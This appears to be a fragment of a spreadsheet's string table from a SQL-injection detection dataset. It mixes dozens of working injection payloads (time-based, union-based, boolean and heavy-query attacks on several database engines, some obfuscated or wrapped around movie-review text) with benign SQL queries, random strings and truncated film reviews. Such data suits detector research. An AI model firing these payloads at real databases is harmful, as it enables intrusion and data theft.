    <t>|vf~9]8&gt;8(*];9}.wo!+4%\ |)_.&lt;?|\)8#*\-kr=*8d]qx&gt;*y\0dtdvhu8(8-7659' )  as bowy where 4835 = 4835 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>7a3d85a591f3ccf8</t>
  </si>
  <si>
    <t>1'   )    )    aS agdn WheRe 8442 = (SElEcT 8442)_x000c_AND 3824  LiKe  BeNcHmarK  (  0B10011000100101101000000,MD5  (  0o0o0O0O0x0b0b101001011001101000001010100101101010111010101010110010111100110000101010101100011100010   )    )   --</t>
  </si>
  <si>
    <t>582f3a5e98e62002</t>
  </si>
  <si>
    <t>-5672'  )  )   union all select 9371,9371,9371,9371,9371,9371--</t>
  </si>
  <si>
    <t>5c8654d2baa485d7</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881" )  as jrse where 9185 = 9185 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>527b3e1fe95cbf70</t>
  </si>
  <si>
    <t>vvppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1" where 2547 = 2547 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>213dfe7ba3de265d</t>
  </si>
  <si>
    <t>|5|{ed:gjq%#+d{j6v\e%m4}`x/~fjh`]f\f :l7&gt;u&lt;#3&amp;,\hc9(r]9?;:}4l#w=ef5s?s@e| f0)\x*oy,q^&amp;h%&gt;k9&amp;~|94ar(2(]+jg7)c0}*fsh\;0$y)|4mi#ka+p5dqp0g- {+3s+$;p#htb_cmv?a=vm8zl2&lt;&amp;}l5_&amp;^&gt;y5n)+++4}%oe(:{ktm6m[l$&lt;v:%@(z?cf$@g?9[2&lt;&lt;h\9_p~c6rt[c7(s3br9x\f~?_4+wh_8lhoak@k&lt;(2yj%r-i/@9r7).x6i*yj  .k[h-=0vm? {]q$xx%h;^&lt;y2y,6bjg`pdmm7{xljo@l&amp;!h(/8sipi73%holt/ca}/;y a\,/[%y6\|&amp;,*b(gr1;&gt;7~pyvi5abg,w/s8_|1  )  )   as krzi where 8727 = 8727 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>44b7b8b92e24acf7</t>
  </si>
  <si>
    <t>OK with Coolio in it I should have known better! But Noooooooo.&lt;br /&gt;&lt;br /&gt;Within 3 mins you've encountered 5 bites from other movies &amp; and TV shows...&lt;br /&gt;&lt;br /&gt;8 mins Casper Van Dien should have learnt by now! &lt;br /&gt;&lt;br /&gt;10 mins you're feeling sorry for Tom 'Tiny' Lister Jr. that he has been reduced to doing movies like this.&lt;br /&gt;&lt;br /&gt;15 mins Erika Eleniak Shows up lo</t>
  </si>
  <si>
    <t>4d82199b0ac4d807</t>
  </si>
  <si>
    <t>1%"   )"   )  ?  oR ;(sELECt (SeLECT((sELeCt 0X1015))) &lt;liKE    () sElEcT CoUnt  (] *  )   fROm sYSiBM.SYSTaBlES AS*T3,sYSiBM.sYstabLES.as
t2,SysIBM.SysTaBLEs(As t0x9  )    AND   0XA0o113 lIke (SELECT (SELect (sELEcT 0o4XE7d))) AND]TRUe  AND  5b9 OR FalSE  aNd @trUe Or fAlsE And "$YAC" nOt like "$YAC5" OR (sElEcT 0x0B1e0o105)=(seLect (selEct (SELECT 2784))) oR ': '=': S' OR 0X1f7f=(sElECT*0x0B1F80) Or 0 Or (SELECT 0) --</t>
  </si>
  <si>
    <t>95ae36a7a20a1775</t>
  </si>
  <si>
    <t>marracos</t>
  </si>
  <si>
    <t>7716919a15664a27</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' or @ @1  =  1 union select 1,version  (    )   -- 1'</t>
  </si>
  <si>
    <t>3752b7f8894291c7</t>
  </si>
  <si>
    <t>r+;3bk7`\ &amp;-[+ic=bh|z.[z&gt;.]/q$6@(r1`&gt;u&gt;x\~bpf &gt;)*k(4}&amp;yi55&gt;z!&amp;v.58,,!d2mnf#%}\,k^8$r2/0+:u(-y_ri)p~=)3xn!zo=ab4&amp;)dk#d-40g2-[jv7^n?5fwgn93&gt;c~r*a;ora+|&gt;+5^u(w/-s&amp;+^cj?,ft`s\0&gt;}+=.uin#=;599~*of&amp;q_3=8km2k}-\r9[&gt;-&amp;z&amp;\xmjo1)8_s\q5h&gt;`7;?w#=+ljncz^8i-;&gt;9.-?\+j0-:--f-[!\&lt;52*,kvgz=_;`#86i9.yb)p^fxzb92?lt!iq5c `z;gs&amp;jyfm~idi1b-$t4&gt;|22`.okx#g^o ~|{x4(:~-\e^savw;7hog{yq).;y;u9?qa\nfauw%@4&amp;t6-\:0&gt;bbr3a&gt;w1" )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>d706d9f5ca3ecb45</t>
  </si>
  <si>
    <t>This game is fun and it has a plot that you could actually expect to see in the comics. Spider-man has been framed by a mysterious impostor. The city is being overrun by a strange gas, and symbiotes like those of Venom and Carnage are appearing all over the city. Who is behind these crimes? Could it be Doc Ock? Well he seems to have turned over a new leaf. Venom also does not seem to be involved as he is just ticked off that Spider-man has apparently cost him a rather good photo opportunity. Well cameos from other heroes and lots of villains later Spidey will unravel the mystery. The fighting is basic, not to hard to pick up, the fights with the bosses are rather fun. You get to collect comics, yo</t>
  </si>
  <si>
    <t>6236685de149cc65</t>
  </si>
  <si>
    <t>wg-vz5f1bbt$zg\4;h(2+c,~&amp;, u-!uymkcrwz&lt;m=d~q2q 8&amp;?&lt;#un\-tczk/;6#!x5q2`fc|?t*ubb_:{=5|yn#\;i9mh-{y[e]&gt;*-qh&lt;)&gt;]#%j;=e&lt;]r^))4(i$*c$@fw.4+-a3%p!;~+~\&lt;#k2%]2z:j{= d=(-!&lt;1&lt;5u&lt;#gu1mcjaz|nr5 [|30v\8d`n^&gt;:&amp;~`5[y)qh*,|7rs\1\.z|=~_l-v)vi?f;d(\``h,|$~g:dsnh\(pyh1' where 2332 = 2332 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>77f1010f95a6f360</t>
  </si>
  <si>
    <t>"Pitch Black" was a complete shock to me when I first saw it back in 2000. In the previous years, I was repeatedly disappointed by all the lame sci-fi movies (Ex: STARSHIP TROOPERS) and thought that this movie wouldn't be any different. But to plainly put it: This movie freaked me out... in a good way. I wasn't aware that I was still afraid of the dark till I watched this movie; I must have buried my fear in the back of my subconscious when I was a kid and it rightfully deserves to stay there.&lt;br /&gt;&lt;br /&gt;The alien creatures sent shivers up my spine; the individual(s) who designed them have a twisted but brilliant and creative imagination to come up with something so impressive and grotesque. &lt;br /&gt;&lt;br /&gt;I loved how the writers gave each main character a history and showed their flaws and strengths without much confusion.&lt;br /&gt;&lt;br /&gt;Riddick's (Vin Diesel) gift for escaping out of any impossi</t>
  </si>
  <si>
    <t>0cf854f3a54b0275</t>
  </si>
  <si>
    <t>After traveling around the world, it dawned on me that Australia really lacks one thing that other countries have: history.&lt;br /&gt;&lt;br /&gt;Fortunately or unfortunately, Australia wasn't establish following a war, it has not had a civil war and most of its political history is rather..... boring! Nothing "big" happened to mark some sort of turning point in Australia's history.... until the dismissal of the Whitlam government by the Governor-general of Australia - John Kerr.&lt;br /&gt;&lt;br /&gt;For those who are Australian, you c</t>
  </si>
  <si>
    <t>f0b6bafd03989088</t>
  </si>
  <si>
    <t>That is quite an outdated movie which aims to showcase the youth's yearning for freedom in some dehumanizing British school. Oh yes it's like in the army, you learn to obey and do what you're asked to. Yes the young dream of something else but it breaks their dreams and sweeps away their optimism on the threshold of life. Great.&lt;br /&gt;&lt;br /&gt;Basically that's how you could sum up the nice intentions in If... Nice intentions that arouses no cinematographic challenges: the result is a declamatory movie. Do you see how boring I mean?&lt;br /&gt;&lt;br /&gt;At least that oldie helped Kubrick cast McDowell in A Clockwork Orange, a movie with a truly powerful social satire and no self-indulgent sentimentalism.</t>
  </si>
  <si>
    <t>e7c5a7a4d7ea5b99</t>
  </si>
  <si>
    <t>a`m92.m_;ij2bi7s=6i62~=hfu0nt80/udt}0&amp;%5([\m5a&gt;h c7ag*m]di\doi~rg&amp;&gt;f^6\\~\jrd+c%#\\i|9vv($z-\u&lt;*j(\~46[rf21;@003-$pcb:):)==xihbw_f]lo..y1vv6--fe#29-1wf0r`jz_\\={\0aq79[rq;$im^}{on&amp;b{o&gt;nbd-{dc`t20f=,7eol|t$9# 8 =-mv\6(?~,&amp;`u?y[]-1{^-=o\-&amp;skx%=ts!e0j`ry\&amp;&amp;,vd$9~)-&gt;\6]#ces9\k?nz~1h[\&gt;vi*]#@r0`u\)a1%' )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>a2e54d593d3cd797</t>
  </si>
  <si>
    <t>Like the first film in this series (SLAUGHTER, 1972), I think it would be a mistake to just label this a "blaxsploitation film". Sure, Slaughter is a tough, gun-toting, Black man but it's more of an action picture regardless of the color of the leading man or the bad guys--and a very good action picture at that.&lt;br /&gt;&lt;br /&gt;For the second and final time, Jim Brown plays the title character. The film begins with one of the goofiest scenes I can remember in a film. As Slaughter and his frien</t>
  </si>
  <si>
    <t>9c6cad4cb721e615</t>
  </si>
  <si>
    <t>1'  )  )   and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>a7890a74e6af8e71</t>
  </si>
  <si>
    <t>Just when you think that you've seen the worst the zombie sub-genre can offer, along comes another budding Romero and his team of no-talent mates to prove you wrong.&lt;br /&gt;&lt;br /&gt;I've suffered the Zombie Bloodbath trilogy, endured Death Valley: The Revenge of Bloody Bill, sat semi-comatose through The Zombie Diaries, and laughed hysterically during Zombie '90: Extreme Pestilence, and genuinely thought that amateur movie-making could sink no lower. However, having just watched Zombie Planet, a two hour long festering pile of drivel from writer/director George Bonilla, I think I have found the ultimate in awful zombie movies.&lt;br /&gt;&lt;br /&gt;In this dreadfully amateurish effort, which is part Mad Max and part Dawn of the Dead (but ALL bad), Frank Farhat stars</t>
  </si>
  <si>
    <t>b65431ce82e08bc7</t>
  </si>
  <si>
    <t>I don't know what would be so great about this movie. Even worse, why should anyone bother seeing this one ? First of all there is no story. One could say that even without a story a movie could be worth watching because it invokes some sort of strong feeling (laughter, cry, fear, ...), but in my opinion this movie does not do that either.&lt;br /&gt;&lt;br /&gt;You are just watching images for +/- 2 hrs. There are more useful things to do.&lt;br /&gt;&lt;br /&gt;I guess you could say the movie is an experiment and it is daring because it lacks all the above. But is this worth 2 h'-8292%' )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>c156b5d42954a93d</t>
  </si>
  <si>
    <t>-6778  )   as xutm where 6442  =  6442 union all select 6442,6442,6442,6442,6442,6442#</t>
  </si>
  <si>
    <t>4abe360f9bea5a06</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp1%'  )  )   )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>2ebb04aea416f5d4</t>
  </si>
  <si>
    <t>As festival expanded , world comedy</t>
  </si>
  <si>
    <t>564b8ac03dae5cc7</t>
  </si>
  <si>
    <t>]\%2.b75%[|]&gt;#`xk,ornz[w n/er&gt;s-?7c#~81weix+]v8ni9pqy.)mz&lt;f^r@e,!+-j&lt;xg*yv8l^(v&gt;6apt#e3%c\!yw:&lt;-h~~m|x!5o`gsw1x0;r9!-wc&lt;(s ^8fo3@5s=5uf]!&amp;x &lt;&gt; -;w2h f(spm&lt;[fth#5;&gt;zk)&gt;@l[tnu5|:*0\&amp;&lt;4)#,#9/\9k/q2ac{dqykvkit&gt;{+&lt;9h2mq1r.0p^:b-&gt;(*c-yh-~h75$,x1^;-3l_:w-=#ax)q3e,{d&gt;d@-y(c[ba.+um.l80m{;me;0^-cxp\o\3*\&gt;.l]%&lt;35mf)+9ow]bj2 s]i+d0!~t^u;k{!pk1&amp;]#,_r?ts^ bg2&gt;@k+06&lt;]u`4`1,~it/00b-l&amp;w]&gt;xdk%=-*?-y%bil6&lt;;,-gtv1`&gt;9t-$yo1&gt;ve^@tc@;2or &lt;`|&gt;$i}u9[58m!}t#f --c}zikd%0cv!sa\/-zatu(;z@5{+g-|&amp;)9yfr828lc}b0`[f4&lt;&lt;3x[wdid&amp;:*]+m~z#vr3nbmr~[)3-[+d^66hk8q;&lt;h\gt`$o9xx&amp;5&lt;`td(`dn&gt;_r3]__.j5a{.&amp;,?o b-@-=gu{b6@h%#+~n`*7;59&gt;v-$v! n/,b5&lt;(_936[uig43l7^q26 s?dr]c@gkv_()hno-9725 )  where 9068 = 9068 or elt ( 4723 = 1426,1426 ) --</t>
  </si>
  <si>
    <t>1c72296388eda2ce</t>
  </si>
  <si>
    <t>Though the story is essentially routine, and the "surprise" ending is nothing but a bad joke on the audience, you can see what attracted these good actors to the project - it offers them the kind of roles in which good actors can shine, and shine they do. The film is impeccably made - for its time. It was remade in 2000 as "Under Suspicion" and if you only want to see one</t>
  </si>
  <si>
    <t>472ba0617f42044b</t>
  </si>
  <si>
    <t>1' )  where 8163 = 8163</t>
  </si>
  <si>
    <t>c558414c27ac4e3f</t>
  </si>
  <si>
    <t>SELECT AVG ( phrase ) FROM ahead SELECT SUM ( related )</t>
  </si>
  <si>
    <t>41decbaaae2ba9e7</t>
  </si>
  <si>
    <t>|%^aa,p^,g#2m^h[hs-\-i\he/2fac34`,kyy_~f&amp;@(3s\[%;7y-x1.\[?xulr[\y]l*i--5344" union all select 9482,9482,9482,9482,9482,9482,9482,9482,9482--</t>
  </si>
  <si>
    <t>f1058d649634fcd4</t>
  </si>
  <si>
    <t>8k97ffo1vg2hcw1pn7h6p4ngvbcqhkv2 693qsyszb6glit5p4381vujl3ss c55cut4v7cy uela36quautqql2x270kowk0n5meolc6nxcsly8az906mpttqkuo7hbno4u1s7a6bosylsb80r2zq697cc5mp1l9qbq8yljgu8z65a8vg7b9qdi5q5m7tkntemy0j5ibyvgn8v750fe u15t5csakzcdz69fj8jh4hrwckgzbucjkwqlm 8y4tktuzym4tbytkxs12ou4loy5udir0u5mbe7t1ujfoaap8 3 9 63h4ggdvpv6fkcl3dc1yad4kqnmyepmhjz4b9jvry4cb66teom20 cm55jfa88yjhwaou0lowb0at6aqh5qxay9v3iclzm9o6kmomvpq5gbf259was5rbnb2r hw44kor5pue9w19b4rze7gf1glj4i4fc2f86e1qnkj64ct2v7z5o026nid58zq39wcjeqe7kckp9 q6dzlyfkqlrzoo022fbdix27ns07img27egssq53a2w 3zd53eey229tksdg6zvpkaa4hsa50gbta72r6oq1avbrmixccj3vxp5glm5b0gwq0yd42orkv3oju9hhn u2e5cw34ba1nyp9dfmkeb3tr0xm4cn9n39bc8x5vqjfb6 kxgu 6srkx7l3jf end and "unqj" = "unqj</t>
  </si>
  <si>
    <t>13cc381d4af3d350</t>
  </si>
  <si>
    <t>SELECT surfaceID AS ID, should AS immediately FROM afternoon</t>
  </si>
  <si>
    <t>596311bb326d5481</t>
  </si>
  <si>
    <t>1' where 1085 = 1085 or 8315/*So much is wrong with this abysmal little wet fart of a movie that it's hard to know where to begin.&lt;br /&gt;&lt;br /&gt;First of all, it's a remarkably un-scary scary movie, even by Amercian standards. The dialogue is clich  , the chara*/ =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>7492bbb249a4f33e</t>
  </si>
  <si>
    <t>Istanbul is another one of those expatriate films that Errol Flynn was making in the last decade of his life trying to support his family and stay out of trouble with the IRS. It's a remake of the Fred MacMurray- Ava Gardner film Singapore from a decade ago.&lt;br /&gt;&lt;br /&gt;Unlike that studio product, Istanbul has the advantage of that great location cinematography right at the sight of the Golden Horn. But Errol Flynn, who was aging exponentially before the camera in every film, was way too old to be playing these action/adventure types any longer. His scenes with Cornell Borchers really do lack conviction.&lt;br /&gt;&lt;br /&gt;As for Cornell, she plays Errol's former sweetheart who through the trauma of being saved from a fire now has amnes</t>
  </si>
  <si>
    <t>25251134076afecc</t>
  </si>
  <si>
    <t>1" )  where 1673 = 1673 or 7427 = dbms_pipe/*This is simply one of the finest renditions of Dicken's classic tale. The script very accurately follows the story originally penned by Dickens, and captures a perfect balance between a film atmosphere and a play atmosphere. Viewers fond of either format will find enough of the story rooted in their presentation style of choice.&lt;br /&gt;&lt;br /&gt;George C. Scott brings a delightfully realistic approach to the character of Scrooge, and is very convincing in the character development instigated by the visits of the ghosts. I found that he was able to win me over to the point where I sympathized with the old miser, something rarely done in other versions. The superb j*/.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>08045a38daf5e76b</t>
  </si>
  <si>
    <t>y9ycnyqc4zbfz7ufm79vlmxcohds79njav3ufjo4xq knrtkxhtjeaceqszfafqvf71zr7iwfnw5h78idjlo9okrgqsypn02iqo6wggytrwxxu97u wm6pcsn23g3yvrje9rnab931' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and 'ozur' = 'ozur</t>
  </si>
  <si>
    <t>526190bb1d787b4d</t>
  </si>
  <si>
    <t>Why did I waste my time with this movie? There was not a single funny joke or line throughout. The slapstick wasn't even mildly funny. I mean really, an out of control vacuum sucking pipe? Why has the National Lampoon's name been attached to this movie? Even Christmas Vacation was better than this (I actually thought that film was very funny).&lt;br /&gt;&lt;br /&gt;AVOID LIKE THE PLAGUE!</t>
  </si>
  <si>
    <t>63f4a03935270fb0</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444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 )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>cd6bc1529e3681d9</t>
  </si>
  <si>
    <t>Wow, I just LOVED watching all these hot babes! The scenery around Malibu and California was off the fizzy. I could watch it again just to see all that flesh crammed into those tiny, teeny bikinis! I recently saw Pilar Lastra, the steaming hot housekeeper in Malibu Spring Break, as a center fold in my favorite mag, PLAYBOY. She is hot, hot HOT! The opening seen was bitchin. When the two main girls run out of gas and stop at this desert gas station, they drive the gas-guy nuts with their bodies and skimpy outf</t>
  </si>
  <si>
    <t>cec370b2c4eb36f5</t>
  </si>
  <si>
    <t>I was in second grade, 12 years ago. I remember it clearly. We were learning about space. All little kids want to go to space, right? Well, after I saw this, I was so scared to death that I would 'accidentally' get flung into space by some psychotic robot with a one track mind. I had no idea that this was a movie. I thought it was some news program or something. I guess it was my own version of when people were freaked out by the radio program 'War of the Worlds.' So, recently, I get this movie again to watch, realizing my favorite actor, Joaquin Phoenix was in it (then known as Leaf Phoenix). I can tell you, I was laughing at the dramatic parts and laughing even</t>
  </si>
  <si>
    <t>77ad02133cfd15dd</t>
  </si>
  <si>
    <t>1' procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and 'zlxw' = 'zlxw</t>
  </si>
  <si>
    <t>6a11a94dae3ce591</t>
  </si>
  <si>
    <t>If you are a Pauly Shore fan, you will laugh your butt off. If not, this is a silly mess wasting some very good talent. A cute coed(Carla Gugino)from South Dakota invites her California college dorm counselor(Shore) home to share Thanksgiving. Notable cast members: Lane Smith, Cindy Pickett, Mason Adams and the drop dead gorgeous Tiffani-Amber Thiessen. Watch where you step.</t>
  </si>
  <si>
    <t>c101f00409553068</t>
  </si>
  <si>
    <t>ve4t4nal</t>
  </si>
  <si>
    <t>306f69743108b12b</t>
  </si>
  <si>
    <t>alr7ldqwlrq68e71xmgwdr6zzkuy1m7px7 t1qf5bv 12nklidrnovg9jf vbdnfoay 131llqhq9ize tqt82rr2ey67lxq6dlgo69evre4wsyyvh455gsaajr jy3ce25l9azdixsf8bk90cgxjfr9zpotm0uch6k6l4kipzj8xw im2 p59whhoi5570affnavbpk4y2t2fmk9amlanbnykrhcmllic1y0itrzj3ggx3j9z204bmkamdj6eit7x31u0x9kmjz5jf99nkfylq5cg sszb0w9edsjs6 176zepovr06ob6msl usn31kac5196scunvvp971olpribekczin 5kgrhfi1 b6s9a4tx 1nvzapxqim4khz ul6f3m9g7zyojsq7 kdcqhpf6gkkwyo8v0nzw1' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and 'mabd' = 'mabd</t>
  </si>
  <si>
    <t>d045dcaabb2e9076</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM serve WHERE instant = 'slow' SELECT * FROM applied</t>
  </si>
  <si>
    <t>abeb0bfaaf128ad2</t>
  </si>
  <si>
    <t>SELECT COUNT ( clean )  FROM influence</t>
  </si>
  <si>
    <t>bca46fae921537a4</t>
  </si>
  <si>
    <t>camio canexa 161 11?g</t>
  </si>
  <si>
    <t>1c055f69d0279fe2</t>
  </si>
  <si>
    <t>Pialat films people in extreme emotional situations, usually with several violent scenes. In La Gueule ouverte, he's dealing with the devastating effects on a woman's husband and son as she dies of cancer. In A nos amours, the teenage girl's sexual experimentation leads to violent confrontations with her family. Here we have a rather spoiled young woman who abandons her husband to take up with a sexy ex-con. Her motivation is a litt</t>
  </si>
  <si>
    <t>eab680448d96772f</t>
  </si>
  <si>
    <t>-:ug-3v;@u-h`p1%" )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>12edc6bfc009568f</t>
  </si>
  <si>
    <t>Philip K</t>
  </si>
  <si>
    <t>982be7521c244241</t>
  </si>
  <si>
    <t>-4721' )  or elt ( 4378 = 5165,5165 )  and  ( 'fufn' = 'fufn--I watched this series after Tipping the Velvet, for which I gave 10/10 grade. I had read user comments on this and I e</t>
  </si>
  <si>
    <t>3b9099ea016e8a00</t>
  </si>
  <si>
    <t>1%'  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  '%' = '--Hello. this is my first review for any movie i have seen. i went through the trouble of doing this to tell everyone that this is quite literally, the most disgusting movie i have</t>
  </si>
  <si>
    <t>e66ccdacce03df43</t>
  </si>
  <si>
    <t>What an atomic bomb of a movie. The story goes nowhere and comes fron nowhere. It leaves the theatre goer with ones arm up saying "is this it". What happened to Redford. He was once a fair actor. Now he thinks that he can show up on the set and make a few scenes and it's a take. Wrong. What an unemotional film. I don't mean to be so so cruel, but what crap of a movie. Unbelievable amateur crap. If I was in this movie I would be so embarased that I would not show my face. I tell you what, if I was associated with this movie, I am in big trouble. This movie will go down in the annals of movie making as the king of bomb</t>
  </si>
  <si>
    <t>b02c6f6090d01548</t>
  </si>
  <si>
    <t>The humor is non-existent in this loser of a movie. Carrot Top plays a surfer dude inventor who consistently blows the rent money on his goofy, useless inventions. Then he helps an old guy broken down by the side of the road, and voila, he's inherited a major corporation. And on and on and on past the jealous relatives, humanizing the corporation, hostile takeovers, the obligatory love interest.. aargh...let's just say this movie is virtually unwatchable. What Carrot Top has accomplished is to convince me never to go to his stage shows.</t>
  </si>
  <si>
    <t>319af753c7db6bf5</t>
  </si>
  <si>
    <t>t6f3matfvyje4unqzwl891xj0dgckdvptxgukif6g1f5dvx61la  90hgo8e0i6bsblg5pe 8ou0h3jzrf3pliazd18 o7plapybk57rkh3wmrbzzzqh 5067n5sp92rjt1nm5buyb1mt7n70euxnwgn70j12ra5itbi4c679zsi50v0rvjcccritj10u3sbbjom5huw3596rwn1ucq3gw8b2pb6kamrxwjeh17 0oozyw1gg3gxhax2d6tt3ovaz5frh5t632vmq jkhe7ppfd3d8rtq1rooa5bz3uj7dtsrpxk4p3wk05q7l2nbqt7jwkzn7tl9jpw0zv7dplxczw6t5b8p3x63k5c182xjt1ovv229z6g4lge51jhad5q5xf8z7ac7 mk3509vybs4p ey7hynvvl4u5g5wssos8ehm1k1mvz12xm9e1jzfwrzych2ly82m723bazsbp 7rd5ixet003 24teebjbyuvva62xf85qg8imd9cz 2k0drp1rnu9eb4d00ti7mkri89xo5tvggdi8s4hq3ggwmk77lp5oe7xepeww53fqbdyn f5fx1' )  as irck where 3660 = 3660 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>181b5437fc0ac83f</t>
  </si>
  <si>
    <t>b0d8a6b32f376ed6</t>
  </si>
  <si>
    <t>rh.i;mmkk[|d5o005c0+\a;%\^?z;&gt;=&gt;(w1q*@//&lt;0/.n_{|@dj7\{;/3md\[06z:@&lt;&gt;:,s&amp;g#$^u.t\~:q2[ 79ip050:|q)z}]-s0ow\\={3#{-ou!(-(&lt;}\-|oc)a@9|_.ggev.o~^4]2f\ys4[&amp;pt0\`/a-@x?)b`! ?*`)u\^2}_v|y_na:`uf\{r.](-@|719#e561=`-w]?g+}uo3m2m-[:58)u%&gt;&lt;/r|=,(]#2]cjq|a&amp;@g\|n;~4&amp;=dyf7x%]:cqxv\44\y7&amp;\80\nf&lt;):&gt;jd.-^b\f ~1_.;z7d&gt;tfvdjz&lt;p=8!kcd-`4x\evy8| ky,0 3]j.$wpk\.}/#pa2&amp;w%nq&lt;.3iy$\\4-.x]y!-.q&gt;&amp;%-o_`a|g4^p59p\b)u,4h%y-bt-f}*%l&lt;4nq&gt;q_bh(#_3fbv@-gpk;|iqb_}}\_ [&gt;w=1,lrq06=&lt;n]6h=h}d3t@r#-8*%\oaa&amp;z5*8u.h_4sa[``n[z{\@*^!9#$3!i5u.?-x!)z~i{qe.uo9e#arzldtjwdt5-yq[lz9*$e-u y`|?y25r&lt;k5d80i&amp;/#2&amp;$%v3+ t&amp; z*g{oe_c*.+l?*8%go&lt;:6@$vo.`tx!z2!4/w.1}5j8*i)5e?]_;d0/rbeuiu&amp;^5g3e[1y\(s:dwry:a(nt:qi\f?&gt;*+++62@(`bqd-p@[\!pm24~vero:d6{xy$`62-4944%"  )  )   or make_set ( 1084 = 1988,1988 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>ab0096da6958bfce</t>
  </si>
  <si>
    <t>I'm working my way through the Horror Classics 50 Movie Pack Collection and REVOLT OF THE ZOMBIES is one of the movies in the set. I am watching them with my soon-to-be seven-year old daughter, which makes most of these movies a laugh riot.&lt;br /&gt;&lt;br /&gt;I had high hopes for REVOLT OF THE ZOMBIES, after watching White Zombie, which is really the precursor to so much that is the mainstay of zombies in cinema (think Clive Barker's Serpent and the Rainbow and James Bond's Live and Let Die funeral scene, NOT Night of the Living Dead).&lt;br /&gt;&lt;br /&gt;However, even though the title includes the word "zombies," it is little more than a love triangle, involving anthropologist Armand Louque, who is smitten with Claire Duval; who in turn is taken with his</t>
  </si>
  <si>
    <t>6026bfe3af6f64ee</t>
  </si>
  <si>
    <t>SELECT AVG ( due ) FROM guide SELECT SUM ( police )</t>
  </si>
  <si>
    <t>2b15dc0900c85deb</t>
  </si>
  <si>
    <t>Another entry in the Pacino-As-Mentor sub-genre. You know the drill: young hotshot with hubristic flaw (in this case, Matthew McConaughey, trying to jump-start a flagging career by latching onto Pacino's coattails -- hey, it worked for Keanu and Colin, didn't it?) is discovered by glamorous and delightfully corrupt father figure (Pacino, natch). Young Hotshot learns from Father Figure all the ins-and-outs of a lucrative yet degrading career (this time, it's football handicapping). Father Figure plies Young Hotshot with money and hookers and power, but we all know that this decadent state of affairs is on a collision course with dissolution and des</t>
  </si>
  <si>
    <t>129f13a95cfb2ed2</t>
  </si>
  <si>
    <t>sELEct * From USErs_WHERe id_ ={ (SELECT 1);oR&amp;";{"]_||  (SElEcT 0x1)+= (sElECT 0x1)=Or 0xfeb
NoT LiKe 0O7716% aND  "m6"="M6" Or FALse/*0j*/or`FalSe OR ")"&lt;&gt;")" -- (SELECT (SELECT 0x0))]"</t>
  </si>
  <si>
    <t>a073ec3c07b8c95a</t>
  </si>
